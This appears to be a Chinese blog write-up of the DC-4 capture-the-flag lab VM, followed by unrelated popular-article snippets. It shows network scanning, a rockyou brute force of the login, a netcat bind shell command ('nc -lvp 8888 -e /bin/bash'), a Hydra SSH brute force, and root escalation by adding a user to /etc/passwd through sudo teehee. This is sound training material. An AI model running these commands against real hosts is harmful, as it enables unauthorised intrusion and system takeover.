靶机实战(DC-4)

DC-4

  • 实验环
  • 实验过程
    • 信息收集
      • 主机发现
      • 端口扫描
      • 服务发现
      • 网站指纹
    • 漏洞发现
    • 漏洞利用
    • 提权
  • 总结

实验环

靶机:DC-4
测试机:kali(IP:192.168.186.128),win10

实验过程

信息收集

主机发现

netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24

在这里插入图片描述

端口扫描

在这里插入图片描述

服务发现

在这里插入图片描述

网站指纹

在这里插入图片描述
网站主页
在这里插入图片描述

漏洞发现

尝试爆破kali字典/usr/share/wordlists/rockyou.txt.gz;用户名:admin 密码:happy
在这里插入图片描述
疑似命令执行,抓包查看
在这里插入图片描述
在这里插入图片描述

漏洞利用

修改参数尝试命令执行漏洞
在这里插入图片描述

Nc -lvp 8888 -t -e /bin/bash
反弹shell

在这里插入图片描述
客户端nc 192.168.186.252 8888 连接
在这里插入图片描述

提权

/home/jim/backups发现曾用密码
在这里插入图片描述
python开启一个简易http服务, wget下载
在这里插入图片描述

Hydra -l jim -P passwd.txt -vV -e ns 192.168.186.252 ssh
尝试爆破ssh

在这里插入图片描述
成功登录,在/var/mail下发现邮件有用户名密码
在这里插入图片描述
su charles尝试切换用户登录
Sudo -l 查看可以root执行的命令
在这里插入图片描述
Teehee修改添加用户/etc/passwd
在这里插入图片描述
在这里插入图片描述

总结

登录口尝试爆破,进入后尝试寻找漏洞,利用nc反弹shell,拿到shell后寻找用户邮箱,曾用相关密码,进行hydra ssh爆破,sudo -l 查看可以root身份执行的命令,结合teehee命令修改/etc/passwd进行提权。

热门文章

暂无图片
编程学习 ·

mogodb日常工作记录

查询相关 db.getCollection(Examda_News_VisitLog).find({"newsId":"20061109480192959"})db.getCollection(Examda_News_VisitLog).find({"from":"xcx","share":{"$gt":0}}).limit(10); # status: "A"…
暂无图片
编程学习 ·

达梦数据守护集群(dmwatch)启停方式

注: 在$DM_HOME/bin目录下执行相关脚本。 停止集群:关闭确认监视器:./DmMonitorServiceDMMONITOR stop 关闭备库守护进程:./DmWatcherServiceDM2 stop 关闭主库守护进程:./DmWatcherServiceDM1 stop 关闭备库数据库服务:./DmServiceDM2 stop 关闭主库数据库服务:./D…
暂无图片
编程学习 ·

Unity的学习(二):打砖块

一、新建项目创建成功后,进入了如下界面。二、场景的设计 在Hierarchy中鼠标右键创建Plane(地面)游戏物体,将其Transform组件重置,并将游戏物体重命名为Ground,如下图所示。调整地面的大小。在Assets下创建文件夹Materials,并在其中创建Ground的Material(材质)并在Gro…
暂无图片
编程学习 ·

Scanner对象

Scanner对象 作为输入使用,主要有两种接收键盘输入字符的方法,next()方法和nextLine()方法,下面介绍一下 import java.util.Scanner;public class demo01 {public static void main(String[] args) {Scanner scanner = new Scanner(System.in);System.out.println("请输…
暂无图片
编程学习 ·

springboot 整合xcf 发布 webservice

Spring Boot集成webService在pom添加依赖<!--WerbService CXF依赖 start--> <dependency><groupId>org.apache.cxf</groupId><artifactId>cxf-rt-frontend-jaxws</artifactId> </dependency> <dependency><groupId>org.…
暂无图片
编程学习 ·

C++--找出三条能构成三角形且周长最大的边的一个普通方法

题目:给定由一些正数(代表长度)组成的数组 A,返回由其中三个长度组成的、面积不为零的三角形的最大周长。如果不能形成任何面积不为零的三角形,返回 0。 #输出示例 输入:[2,1,2] 输出:5 输入:[1,5,1] 输出:0 输入:[3,2,3,4] 输出:10 输入:[3,6,2,3] 输出:8 #inclu…
暂无图片
编程学习 ·

【LEETCODE】718.最长重复子数组-动态规划+滑动窗口

题目 给两个整数数组 A 和 B ,返回两个数组中公共的、长度最长的子数组的长度。 思路 设数组A长度为n,B长度为m动态规划: 设置动态规划数组dp[n+1][m+1],dp[n][m]=0。 从A[n-1]和B[m-1]开始向前遍历比较,可以得出伪代码: if A[i]==B[j]:dp[i][j]=dp[i+1][j+1]+1; else if …
暂无图片
编程学习 ·

第一次用IDEA创建maven工程时间

第一次在idea中创建maven工程花费20+min 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与…
暂无图片
编程学习 ·

web编程期末大作业 项目一

作业要求一、登录注册页面 检测用户名密码是否一致,是则跳转至新闻页面增加注册用户登录界面如下: 发现自己实在是不太了解bootstrap的各种样式,界面也不知道该怎么优化,后面的html文档的css就都用的老师给的模板了 -_-||二、操作记录保留 首先先在数库中建立两张表,一个存…
暂无图片
编程学习 ·

JavaScript 详解预编译原理

JavaScript 预编译原理 今天用了大量时间复习了作用域、预编译等等知识 看了很多博文,翻开了以前看过的书(好像好多书都不会讲预编译) 发现当初觉得自己学的很明白,其实还是存在一些思维误区 (很多博文具有误导性) 今晚就整理了一下凌乱的思路 先整理一下预编译的知识吧,…
暂无图片
编程学习 ·

数据库---常用数据库的驱动程序

Oracle数据库 驱动程序包名:ojdbc6.jar 驱动类的名字:oracle.jdbc.driver.OracleDriverJDBC URL:jdbc:oracle:thin: @dpip:port: databasename 说明:驱动程序包名有可能会变 JDBC URL中各个部分含义如下: dbip –为数据库服务器的IP地址,如果是本地可写:localhost或127.…
暂无图片
编程学习 ·

js 的类

js的函数和类的区别,自以为就是调用方式的不同,并且函数中写入属性、方法,就必须实例化后,才能外部调用var Func = function(){var fu = this;var a=1, // 外部调用不到b=2;this.c=3;fu.test=function(){console.log(a)} }fun = new Func(); fun.c // 3 fun.test // 1funct…
暂无图片
编程学习 ·

VS2013编译通过但代码中有红色波浪线

问题描述:VS2013编译无问题但代码中有许多红色下划波浪线解决方案: 1、有些博客分享的方法是:项目属性->c/c++ ->常规->附加包含目录->添加包含代码文件夹的根目录;再填入:$(ProjectDir) 这个方法我没有改成功 2、最后用这个方法解决的:点击上方工具栏的工具…
暂无图片
编程学习 ·

linux重要知识清单:进程管理

相关的系统调度fork(): 用于创建进程,Linux中进程的创建者与被创建者是父子关系clone():克隆,真正实现创建进程的操作,fork()是不带参数的,clone()是带参数的,通过不同的参数后,可以不仅仅做fork(),也能做其他的创建进程的方式exec():加载外部存储器的一段代码,把一个可…
暂无图片
编程学习 ·

清华大学计算机研究生机试真题 问题 A: 输出梯形

问题 A: 输出梯形题目描述输入一个高度h,输出一个高为h,上底边为h的梯形。输入一个整数h(1<=h<=1000)。输出h所对应的梯形。样例输入5样例输出******************************** *************C++实现一开始只尝试读取一个h,出现WRONGANSWER50,后来用while进行循环读…
暂无图片
编程学习 ·

论面向服务架构设计及其应用

在准备架构师考试过程中发现可供参考的论文范围非常少且内容陈旧给学习带来很大烦恼,通过考试后把我准备的论文共享出来水平有限但内容格式迎合考试,希望给大家一个参考。范文以“论面向服务架构设计及其应用”为题书写,希望对大家有所帮助。【摘要】2017年5月,我参加了某省…